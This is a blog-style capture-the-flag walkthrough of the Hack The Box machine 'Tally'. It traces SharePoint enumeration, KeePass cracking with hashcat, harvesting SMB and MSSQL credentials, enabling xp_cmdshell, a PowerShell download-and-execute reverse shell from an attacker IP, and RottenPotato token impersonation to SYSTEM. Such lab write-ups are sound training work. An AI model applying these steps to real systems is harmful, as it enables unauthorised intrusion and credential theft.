OS: Windows
IP: 10.10.10.59
Enumeration:
Today's write-up is for machine names "Tally". We begin with a nmap scan to list vulnerable ports and services and we see numerous ports open 21/tcp, 80/tcp,81/tcp, 135/tcp, 139/tcp, 445/tcp,808/tcp and 1433/tcp. We notice that port 80 is running sharepoint: 80/tcp open http Microsoft IIS httpd 10.0_http-generator: Microsoft SharePoint.
Upon visiting the site using the IP we are redirected to a sharepoint site.
Bruteforcing Microsoft SharePoint using gobuster gives up a bunch of directories but of interest was the /shared documents/forms/allitems.aspx directory. Browsing using the default _layouts/viewlsts.aspx directory should also redirect you to the same directory which when we browse to Documents we get ftp details.
We have a password and hostname from the ftp details but no username. The finance part of sharepoint had a couple of usernames that we will attempt to use: Sarah, Tim, Rahul and ftp_user.
We use the credentials and attempt to login via ftp and ftp_user as the username works with the password. We then navigate around the numerous file we are presented with and find nothing interesting. Going back to the Users directory, under User Tim we find a keepass database file that usually stores passwords which we download. For easy navigation you can also use filezilla.
We then use keepass2john to crack the keepass database to retrieve passwords. we google hashcat example_hashes and search for keepass2 6000 and looks like the hashmode is 13400.
Next we run the hash against hashcat and get the password: simplementeyo
We then use Tim’s password- simplementeyo to open up the database with Keepassx. We find three entries; Title: TALLY ACC SHARE, Username: Finance, and Password Acc0unting. We use this credentials to connect to SMB:
I also used smbmap from github (https://github.com/ShawnDEvans/smbmap.git). After going through all folders in the smb shares, I found an interesting file under ACCT\zz_Archived\SQLnamed conn-info.txt which I downloaded. Inside this file I found MSSQL database login credentials. You can alternatively run;
smbclient \\\\10.10.10.59\\ACCT -U Finance OR sudo mount -t cifs //10.10.10.59/ACCT /mnt/TEMP -o,user=Finance,password=Acc0unting,vers=2.0
We connect to mssql using the credentials found and inside Microsoft SQL Server we check whether we can use xp_cmdshell. And we are able to find that we are user sarah and SeImpersonatePrivilege token is set to enabled.
To test it run:
1> EXEC xp_cmdshell ‘whoami’
2> go
To turn on the component, run:
1> EXEC SP_CONFIGURE N'show advanced options', 1
2> go
Run the RECONFIGURE statement to install.
1> RECONFIGURE
2> go
1> EXEC SP_CONFIGURE N'xp_cmdshell', 1
2> go
Run the RECONFIGURE statement to install.
1> RECONFIGURE
2> go
Enumeration:
1> xp_cmdshell "whoami"
2> go
To enumerate;
1> xp_cmdshell "whoami"
2> go
1> xp_cmdshell 'dir C:\';
2> go
1> xp_cmdshell "whoami /priv'
2> go
1> xp_cmdshell 'cd C:\ & systeminfo';
2> go
To see if AV is enabled:
1> xp_cmdshell 'type C:\Users\Sarah\Desktop\todo.txt';
2> go
To get a Shell, I used Nishang and set up our nc listener with same port assigned to nishang's- Invoke-PowerShellTcp.ps1. We then use xp_cmd shell to get the reverse shell. (xp_cmdshell "powershell (New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/rev-9000.ps1')"). We find out that we are blocked "because this component is turned off as part of the security configuration for this server."
Next we create a msfvenom backdoor which we will upload using ftp. We also start a msfconsole listener for our reverse shell and upload the shell via ftp Intranet directory.
We set up a second listener using auxiliary/admin/mssql/mssql_exec and execute our payload via MSSQL. We run it and it creates a metasploit shell.
PRIV ESCALATION:
For this we are going to load incognito (used to impersonate user tokens). We then use roten potato.exe(git clone https://github.com/foxglovesec/RottenPotato.git) as we currently have no tokens (list_token -u). We upload it using ftp using ftp_user. Then upload it to our meterpreter: upload /root/Desktop/RottenPotato/rottenpotato.exe.
Next we execute the file (execute -Hc -f rottenpotato.exe) and impersonate the token (impersonate_token "NT AUTHORITY\\SYSTEM") to get root.
Comments
Post a Comment